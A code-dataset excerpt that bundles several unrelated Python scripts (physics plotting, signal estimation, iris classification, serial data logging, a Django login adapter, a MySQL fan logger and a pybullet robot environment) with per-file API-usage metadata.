"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.scatter",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 54,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 55,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.legend",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 59,
"usage_type": "name"
}
] |
30950837477
|
def D0(fp):
Dt = 1
taur = 1./(3*Dt)
return fp**2*taur/2.
def rms(fp,ts):
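    # analytic mean-square displacement of an active Brownian particle in d dimensions:
    # a translational-diffusion term plus a persistent-swimming term with reorientation time taur;
    # ts is assumed to be in simulation steps, converted to time by the 1e-5 factor below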
Dt = 1
taur = 1./(3*Dt)
d = 2
tts = ts*1e-5
return 4*Dt*tts+fp**2*taur**2/(d*(d-1))*(2*d*tts/taur+np.exp(-2*d*tts/taur)-1)
def swim(fp,rho):
Dt = 1
taur = 1./(3*Dt)
return rho*fp*fp*taur/2.0
if __name__=="__main__":
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append('../../plotting_scripts')
from jupyterplots import JupyterPlots
sys.path.append('../../analysis_scripts')
from logloader import LogLoader
figsize = JupyterPlots()
prefix1 = 'data2/'
tcut = -1
fps = np.array([1,5,10,20,40,60,80,100],int)
# density (in lj units)
rho = '0.7'
fig,axarr = plt.subplots(2,sharex=True,figsize=[figsize[0],figsize[0]*2])
fp = 100
fname = f'pressure_{fp}_{rho}'
ll = LogLoader(prefix1 + f'log_{fp}_{rho}.lammps.log')
ts = ll.data['Step']
RMSs = ll.data['c_mymsdd[4]']
Ps = ll.data['c_press']
Ds = ll.data['v_Diff']
#data = np.loadtxt(prefix1 + fname + '.txt.fixprint')
#ts = data[:,0]
#Ts = data[:,1]
#Ds = data[:,2]
#Ps = data[:,3]
#tcut = 200000
print(ts)
#axarr[0].plot(ts[1:],np.gradient(RMSs,ts)[1:]/4e-5,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,RMSs,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,rms(fp,ts),'k-')
#axarr[0].plot(ts,D0(fp)+0*ts,'k-')
#axarr[0].plot(ts[1:],Ds[1:],'.',label=rf'$f_p={fp}$')
axarr[1].plot(ts,Ps,'o',label=rf'$f_p={fp}$')
axarr[1].plot(ts,swim(fp,float(rho))+ts*0,'k-',label=rf'$f_p={fp}$')
axarr[0].set_ylabel(r'$<R^2>$')
axarr[1].set_ylabel(r'$P_{eff}$')
axarr[1].set_xlabel(r'$t$')
fig.savefig('results_single_pressure/' + fname + '.pdf')
plt.show()
|
samueljmcameron/ABPs_coarse_graining
|
experiments/2020_03_31/no_interactions_pressure/single_pressure.py
|
single_pressure.py
|
py
| 1,818 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sys.path.append",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "jupyterplots.JupyterPlots",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "logloader.LogLoader",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 81,
"usage_type": "name"
}
] |
73279162747
|
import numpy as np
import matplotlib.pyplot as plt
# system variables
fs = 100e3
f = 1e3
phi = np.pi/4
N = 4*fs/f
n_var = 0.01
# create some empty vectors to fill
x = np.zeros(N, dtype=complex)
n_a = np.zeros(N, dtype=complex)
e = np.zeros(N)
w = np.zeros(N)
y = np.zeros(N, dtype=complex)
y_ = np.zeros(N, dtype=complex)
w_ = np.zeros(N)
# loop through performing esitmation
for n in xrange(int(N)):
# create reference signal
x[n] = np.exp(1j*(2*n*np.pi*f/fs + phi))
# create noise to get received signal
n_a[n] = float(np.random.normal(0, np.sqrt(n_var), 1)) + 1j*float(np.random.normal(0, np.sqrt(n_var), 1))
y[n] = x[n] + n_a[n]
# create the estimated signal
y_[n] = np.exp(1j*sum(w_))
# create the error signal
e[n] = y[n] * y_[n]
# create new frequency estimate
w_[n] = e[n]
# plot the results
plt.plot(np.real(x))
plt.plot(np.imag(y_))
plt.title("Maximum Likelihood Phase Estimation")
plt.xlabel("samples")
plt.ylabel("amplitude")
plt.show()
|
yrrapt/ada-comms
|
sinusoid_estimate_noise.py
|
sinusoid_estimate_noise.py
|
py
| 1,012 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "numpy.pi",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "numpy.random.normal",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "numpy.sqrt",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "numpy.real",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 41,
"usage_type": "name"
},
{
"api_name": "numpy.imag",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 45,
"usage_type": "name"
}
] |
30192351629
|
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_iris
iris = load_iris()
X = iris.data
y = iris.target
def sigmoid(inX):# define the sigmoid function
return 1.0/(1+np.exp(-inX))
def std_data(X):
    means = X.mean(axis=0) # mean
    stds = X.std(axis=0) # standard deviation
    A=X.shape[0] # number of samples
    B= X.shape[1] + 1 # parameter dimension (features plus bias)
X_std = np.ones((A, B))
X_std[:, 1:] = (X - means) / stds
return X_std
def predict(Pw): # return predicted labels (argmax of class probabilities)
y_pred=[]
for p in Pw:
P=list(p)
y_pred.append(P.index(max(P)))
return y_pred
def gradAscent(X_train,y_train,K_num):# solve for the weights by gradient descent
loss=[]
ks = list(set(y_train))
    N=X_train.shape[0] # N: number of samples
    M = X_train.shape[1] + 1 # M: dimension of the parameter vector
data = std_data(X_train)
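    # only K-1 weight vectors are learned; the remaining class acts as the reference in the softmax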
    Weight = np.zeros((K_num - 1, M)) # matrix storing the parameters
temp=[1.0 / N * np.sum(data[y_train == ks[i]], axis=0) for i in range(K_num - 1)]
    priEs = np.array(temp) # expected values
for i in range(1000):
wx = np.exp(np.dot(Weight, data.transpose()))
probs = np.divide(wx, 1 + np.sum(wx, axis=0).transpose())
pEs = 1.0 / N * np.dot(probs, data)
loss.append(np.sum(pEs-priEs))
        gradient = pEs - priEs + 1.0 /100 * Weight # gradient, plus a small weight-decay term
        Weight = Weight - gradient # update the parameters
plt.figure()
x=[i for i in range(1000)]
plt.plot(x,loss)
plt.title('loss line')
plt.xlabel('number')
plt.ylabel('loss')
plt.show()
return Weight
def LogisticRegression(Weight,K,X_test):
N1= X_test.shape[0]
data=std_data(X_test)
prob = np.ones((N1,K))
prob[:,:-1] = np.exp(np.dot(data,Weight.transpose()))
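    # the last column stays at exp(0) = 1 (the reference class) before the row-wise normalization below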
    prob =prob/ np.array([np.sum(prob,axis = 1)]).transpose() # probabilities
return prob
def main():
    split_list = [0.1, 0.3, 0.5] # test-set fractions to evaluate
for i in split_list:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=i)
K_num = np.shape(list(set(y_train)))[0]
W = gradAscent(X_train, y_train, K_num)
prob = LogisticRegression(W, K_num, X_test)
y_pre = predict(prob)
print("测试集:{} 准确率:{}".format(i, accuracy_score(y_pre, y_test)))
if __name__ == "__main__":
main()
|
TJPU-ML/Homework-for-the-fall-semester-of-2018
|
iris classification/王熙煚/lris.py
|
lris.py
|
py
| 2,416 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "sklearn.datasets.load_iris",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.divide",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 46,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 48,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 49,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.xlabel",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 50,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.ylabel",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 51,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "numpy.ones",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "numpy.exp",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "numpy.dot",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "numpy.sum",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.shape",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.accuracy_score",
"line_number": 72,
"usage_type": "call"
}
] |
12242514248
|
#!/usr/bin/env python
from rootpy import ROOT
from rootpy.io import File
from rootpy.tree import Tree
from collections import deque
def find_maintenance(filename):
aux_file = File(filename, 'read')
aux_tree = aux_file.get('t_hk_obox')
maintenance_start = False
maintenance_list = []
gps_time_list = []
ship_time_list = []
for entry in aux_tree:
if entry.obox_is_bad > 0: continue
if entry.obox_mode.encode('hex') == '04':
if not maintenance_start:
maintenance_start = True
gps_time_list.append(entry.abs_gps_week * 604800 + entry.abs_gps_second)
ship_time_list.append(entry.abs_ship_second)
else:
if maintenance_start:
maintenance_start = False
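                # record the midpoint of the finished maintenance window, in ship time and in GPS time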
maintenance_list.append(((ship_time_list[0] + ship_time_list[-1]) / 2, (gps_time_list[0] + gps_time_list[-1]) / 2))
gps_time_list = []
ship_time_list = []
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in maintenance_list]
def find_orbitstart(filename):
LAT_LEN = 500
lat_deque = deque()
orbitstart_list = []
ppd_file = File(filename, 'read')
ppd_tree = ppd_file.get('t_ppd')
ready_flag = True
pre_diff = 0.0
cur_diff = 0.0
for entry in ppd_tree:
if entry.flag_of_pos != 0x55: continue
lat_deque.append((entry.latitude, entry.ship_time_sec, entry.utc_time_sec))
if len(lat_deque) < LAT_LEN:
pre_diff = lat_deque[-1][0] - lat_deque[0][0]
continue
else:
lat_deque.popleft()
cur_diff = lat_deque[-1][0] - lat_deque[0][0]
if ready_flag and pre_diff < 0 and cur_diff >= 0:
orbitstart_list.append(((lat_deque[-1][1] + lat_deque[0][1]) / 2, (lat_deque[-1][2] + lat_deque[0][2]) / 2))
ready_flag = False
if not ready_flag and pre_diff > 0 and cur_diff <= 0:
ready_flag = True
pre_diff = cur_diff
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in orbitstart_list]
|
ZhenghengLi/POLAR_DATA
|
Preprocessing/script/split_time.py
|
split_time.py
|
py
| 2,130 |
python
|
en
|
code
| 2 |
github-code
|
6
|
[
{
"api_name": "rootpy.io.File",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "rootpy.io.File",
"line_number": 34,
"usage_type": "call"
}
] |
18446576990
|
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponseRedirect
from allauth.account import signals
from allauth.account.adapter import DefaultAccountAdapter
class AccountAdapter(DefaultAccountAdapter):
def is_open_for_signup(self, request):
return getattr(settings, "ACCOUNT_SIGNUP_OPEN", True)
def post_login(self, request, user, *, email_verification, signal_kwargs, email, signup, redirect_url):
        # Copied from https://github.com/pennersr/django-allauth/blob/master/allauth/account/adapter.py#L441 in order
# to remove the "logged in" message. See this issue for more information: https://github.com/pennersr/django-allauth/issues/3205
from allauth.account.utils import get_login_redirect_url
response = HttpResponseRedirect(get_login_redirect_url(request, redirect_url, signup=signup))
if signal_kwargs is None:
signal_kwargs = {}
signals.user_logged_in.send(
sender=user.__class__,
request=request,
response=response,
user=user,
**signal_kwargs,
)
if getattr(settings, "ACCOUNT_SHOW_POST_LOGIN_MESSAGE", True) is True:
self.add_message(
request,
messages.SUCCESS,
"account/messages/logged_in.txt",
{"user": user},
)
return response
|
epicserve/django-base-site
|
apps/accounts/auth_adapter.py
|
auth_adapter.py
|
py
| 1,443 |
python
|
en
|
code
| 284 |
github-code
|
6
|
[
{
"api_name": "allauth.account.adapter.DefaultAccountAdapter",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.conf.settings",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "allauth.account.utils.get_login_redirect_url",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "allauth.account.signals.user_logged_in.send",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "allauth.account.signals.user_logged_in",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "allauth.account.signals",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "django.conf.settings",
"line_number": 30,
"usage_type": "argument"
},
{
"api_name": "django.contrib.messages.SUCCESS",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "django.contrib.messages",
"line_number": 33,
"usage_type": "name"
}
] |
6166850776
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 6 16:06:45 2017
@author: Francesco
"""
import threading
import sys
import serial
import numpy as np
import time
import matplotlib.pyplot as plt
global PORT
global BAUD
global NUM_CHANNELS
global END_BUNDLE_BYTE
global BYTE_PER_CHANNEL
global BUNDLE_LENGTH
#BUNDLE SHAPE: |!|!|!|CH0_msb|CH0_lsb|ch1_msb|ch1_lsb|......|ch7_lsb|!|!|!|
PORT = "COM3"
BAUD = 115200
NUM_CHANNELS = 8
END_BUNDLE_BYTE = 3
BYTE_PER_CHANNEL = 2 #two bytes to represent int
BUNDLE_LENGTH = NUM_CHANNELS*BYTE_PER_CHANNEL
global ROWS
global COLS
ROWS = 4
COLS = 2
global ACQUISITION_TIME
ACQUISITION_TIME = 60
global SAMPLING_INTERVAL
SAMPLING_INTERVAL = 0.5
global n_MOVEMENT_TO_UNDERSTAND
n_MOVEMENT_TO_UNDERSTAND = 4 #up down left right
global movements
movements = ["up\n","down\n","left\n","right\n"]
class SerialReader(threading.Thread):
def __init__(self, name, port_name, baud, data, event_run):
threading.Thread.__init__(self)
self.name = name
self.port_name = port_name
self.baud = baud
self.event_run = event_run
self.data = data
print("Attempting to open port %s at baud %d" %(self.port_name,self.baud))
self.port = serial.Serial(self.port_name,self.baud,timeout=1)
if(self.port.isOpen()): print("Port Open")
def run(self):
start_time = time.time()
running = True
while(running):
try:
#actual decoding
if(self.port.read(END_BUNDLE_BYTE).decode("raw_unicode_escape") == '!!!'):
temp = self.port.read(BUNDLE_LENGTH)
#print(temp)
for channel in range(0,NUM_CHANNELS):
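                        # each 16-bit channel value arrives as two bytes, high byte first (big-endian)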
self.data[channel] = (temp[channel*BYTE_PER_CHANNEL]<<8)|(temp[channel*BYTE_PER_CHANNEL + 1 ])
#allow the plotting thread to access the data
self.event_run.set()
self.event_run.clear()
time.sleep(SAMPLING_INTERVAL)
total_elapsed = time.time() - start_time
if(total_elapsed > ACQUISITION_TIME): #more than 30 seconds of acquisition
print("From %s, closing port"%self.name)
self.port.close()
running = False
except KeyboardInterrupt:
self.port.close()
break
class DynamicPlotter(threading.Thread):
def __init__(self,name,data,event_run):
threading.Thread.__init__(self)
        # Write output to a file.
self.out_file = open("test.txt","w")
self.data = data
self.event_run = event_run
self.name = name
self.number_of_acq_total = ACQUISITION_TIME/SAMPLING_INTERVAL
self.number_of_acq_per_movement = self.number_of_acq_total/n_MOVEMENT_TO_UNDERSTAND
def run(self):
running = True
counter_total = 0
counter = 0
while(running):
self.event_run.wait()
#print("From %s, writing to the file!"%self.name)
self.out_file.write(str(self.data[0])) #only to avoid printing a coma
for value in self.data[1:]:
self.out_file.write(',')
self.out_file.write(str(value))
self.out_file.write('\n')
if(counter == 0):
print("Counter total:%d"%counter_total)
index = int(counter_total/self.number_of_acq_per_movement)
message = "Movement: %s"%movements[index]
#why is this working?
#let's suppose: counter=0 and counter_total =
print("%s: %s"%(self.name,message))
self.out_file.write(message)
counter_total += 1
counter += 1
if(counter == self.number_of_acq_per_movement):
#reset counter
counter = 0
#print("From %s, checking if set: %d!"%(self.name,self.event_close.is_set()))
if(counter_total == self.number_of_acq_total ): #6 acquisitions,
print("From %s, closing the file!"%self.name)
self.out_file.close()
running = False
if __name__ == "__main__":
#matrix that holds values read by
data = np.zeros(NUM_CHANNELS)
event_run = threading.Event()
try:
s = SerialReader("Serial Reader",PORT,BAUD,data,event_run)
p = DynamicPlotter("File maker",data,event_run)
s.start()
p.start()
s.join()
p.join()
except KeyboardInterrupt:
raise ValueError('Catch command to stop from keyboard')
sys.exit(0)
|
FrancesoM/UnlimitedHand-Learning
|
python_side/multithread.py
|
multithread.py
|
py
| 5,210 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "threading.Thread",
"line_number": 48,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "serial.Serial",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "threading.Thread.__init__",
"line_number": 94,
"usage_type": "call"
},
{
"api_name": "threading.Thread",
"line_number": 94,
"usage_type": "attribute"
},
{
"api_name": "numpy.zeros",
"line_number": 145,
"usage_type": "call"
},
{
"api_name": "threading.Event",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 162,
"usage_type": "call"
}
] |
16270189491
|
import pymysql
import datetime
def insert(outsideTemp, insideTemp, targetTemp, fanState):
sql = "INSERT INTO FANS ( `time`, `outside_temp`, `inside_temp`, `target_temp`, `fan_state`) "
sql += "VALUES ( \"{0}\", {1}, {2}, {3}, {4})".format(datetime.datetime.now(), outsideTemp, insideTemp, targetTemp, fanState)
try:
connection = pymysql.connect(host='localhost', db='fans')
#connection = pymysql.connect(host='localhost', user='root', db='fans', password='c0staRic4')
#connection = pymysql.connect(host='localhost', user='pi', db='fans')
cursor = connection.cursor()
#print(sql)
cursor.execute(sql)
connection.commit()
finally:
connection.close()
def select_today():
sql = "SELECT * FROM FANS WHERE DATE(time)=CURRENT_DATE()"
return select_sql(sql)
def select_last():
sql="select * from FANS order by time desc limit 1"
return select_sql(sql)
def select_sql(sql):
try:
connection = pymysql.connect(host='localhost', db='fans')
cursor = connection.cursor()
cursor.execute(sql)
result = cursor.fetchall()
finally:
connection.close()
return result
'''
CREATE USER 'pi'@'localhost';
GRANT ALL on *.* to 'pi'@'localhost' WITH GRANT OPTION;
create database fans;
use fans;
CREATE TABLE `FANS` (
`time` TIMESTAMP NOT NULL,
`outside_temp` FLOAT NOT NULL,
`inside_temp` FLOAT NOT NULL,
`target_temp` FLOAT NOT NULL,
`fan_state` BOOLEAN NOT NULL,
PRIMARY KEY (`time`)
);
INSERT INTO fans ( `time`, `outside_temp`, `inside_temp`, `fan_state`)
VALUES ( datetime.datetime.now(), 56.7, 74.0, TRUE )
'''
|
scottware/fans
|
database.py
|
database.py
|
py
| 1,653 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "datetime.datetime.now",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "pymysql.connect",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pymysql.connect",
"line_number": 29,
"usage_type": "call"
}
] |
73700516027
|
import os, time, gc
import numpy as np
import gym
import random
from gym import spaces
from gym.utils import seeding
from screeninfo import get_monitors
import pybullet as p
from .agents.objects import Object
from .util import Util
from .agents.agent import Agent
class BaseEnv(gym.Env):
def __init__(self, time_step=0.02, frame_skip=5, render=False, gravity=-9.81, seed=1001):
self.time_step = time_step
self.frame_skip = frame_skip
self.gravity = gravity
self.id = None
self.gui = False
self.gpu = False
self.view_matrix = None
self.seed(seed)
if render:
self.render()
else:
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
self.directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'assets')
# Define action space for each robot
self.action_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
action_robot_len = len(robot_class.controllable_joint_indices)
# Add gripper action if gripper is enabled
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
action_robot_len += 1
elif len(self.gripper_enabled_robots) != len(self.my_robots):
print("Gripper enabling mode for robots needs to be defined for every single robot")
exit()
self.action_space_robot[robot_name] = spaces.Box(low=np.array([-1.0]*action_robot_len, dtype=np.float32), high=np.array([1.0]*action_robot_len, dtype=np.float32), dtype=np.float32)
# Define observation space for each robot
self.observation_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
if len(self.obs_len_robots) == len(self.my_robots):
obs_robot_len = self.obs_len_robots[robot_name]
else:
print("Received observation lenghts for robots needs to be defined for every single robot")
exit()
self.observation_space_robot[robot_name] = spaces.Box(low=np.array([-1000000000.0]*obs_robot_len, dtype=np.float32), high=np.array([1000000000.0]*obs_robot_len, dtype=np.float32), dtype=np.float32)
self.plane = Agent()
def step(self, action):
raise NotImplementedError('Implement observations')
def _get_obs(self, agent=None):
raise NotImplementedError('Implement observations')
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def set_seed(self, seed=1000):
self.np_random.seed(seed)
def enable_gpu_rendering(self):
self.gpu = True
def disconnect(self):
p.disconnect(self.id)
def reset(self):
p.resetSimulation(physicsClientId=self.id)
if not self.gui:
# Reconnect the physics engine to forcefully clear memory when running long training scripts
self.disconnect()
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
if self.gpu:
self.util.enable_gpu()
# Configure camera position
p.resetDebugVisualizerCamera(cameraDistance=8, cameraYaw=90, cameraPitch=-30, cameraTargetPosition=[0, 0, 1], physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_MOUSE_PICKING, 0, physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_GUI, 0, physicsClientId=self.id)
p.setTimeStep(self.time_step, physicsClientId=self.id)
# Disable real time simulation so that the simulation only advances when we call stepSimulation
p.setRealTimeSimulation(0, physicsClientId=self.id)
p.setGravity(0, 0, self.gravity, physicsClientId=self.id)
self.last_sim_time = None
self.iteration = 0
self.task_success_clock = 0
self.task_success_switch = False
self.task_success = {}
for robot_name, robot in self.my_robots.items():
self.task_success[robot_name] = 0
self.updatable_objects = {}
Object.instances = []
self.threshold_picking = 0.02
def create_world(self):
# Load the ground plane
plane = p.loadURDF(os.path.join(self.directory, 'plane', 'plane.urdf'), physicsClientId=self.id)
self.plane.init(plane, self.id, self.np_random, indices=-1)
# Randomly set friction of the ground
# self.plane.set_frictions(self.plane.base, lateral_friction=self.np_random.uniform(0.025, 0.5), spinning_friction=0, rolling_friction=0)
# Disable rendering during creation
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0, physicsClientId=self.id)
# Create robots
for _, robot in self.my_robots.items():
robot.init(self.directory, self.id, self.np_random)
robot.set_gravity(0, 0, 0)
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere = self.create_sphere(radius=0.003, mass=0.0, pos=finger_COM_pos, collision=False, rgba=[0.5, 0.5, 0.5, 0.5])
def take_step(self, actions, gains=None, forces=None, action_multiplier=0.05, step_sim=True):
if self.last_sim_time is None:
self.last_sim_time = time.time()
self.iteration += 1
for i, (robot_name, robot) in enumerate(self.my_robots.items()):
robot_actions = actions[robot_name].copy()
robot_actions = np.clip(robot_actions, a_min=self.action_space_robot[robot_name].low, a_max=self.action_space_robot[robot_name].high)
robot_actions *= action_multiplier
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
joint_actions = robot_actions[:-1]
gripper_action = True if robot_actions[-1]<0 else False
else:
joint_actions = robot_actions
joint_actions *= robot.action_multiplier
# Append the new action to the current measured joint angles
robot_joint_angles = robot.get_joint_angles(robot.controllable_joint_indices)
# Update the target robot joint angles based on the proposed action and joint limits
for _ in range(self.frame_skip):
below_lower_limits = robot_joint_angles + joint_actions < robot.controllable_joint_lower_limits
above_upper_limits = robot_joint_angles + joint_actions > robot.controllable_joint_upper_limits
joint_actions[below_lower_limits] = 0
joint_actions[above_upper_limits] = 0
robot_joint_angles[below_lower_limits] = robot.controllable_joint_lower_limits[below_lower_limits]
robot_joint_angles[above_upper_limits] = robot.controllable_joint_upper_limits[above_upper_limits]
robot_joint_angles += joint_actions
robot.control(robot.controllable_joint_indices, robot_joint_angles, robot.motor_gains, robot.motor_forces)
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
self.update_grippable_objects(gripper_action, robot_name, robot)
if step_sim:
# Update all agent positions
for _ in range(self.frame_skip):
p.stepSimulation(physicsClientId=self.id)
self.update_targets()
self.update_objects()
self.update_robot_finger_COM()
if self.gui:
# Slow down time so that the simulation matches real time
self.slow_time()
def slow_time(self):
# Slow down time so that the simulation matches real time
t = time.time() - self.last_sim_time
if t < self.time_step:
time.sleep(self.time_step - t)
self.last_sim_time = time.time()
def update_targets(self):
pass
def update_objects(self):
pass
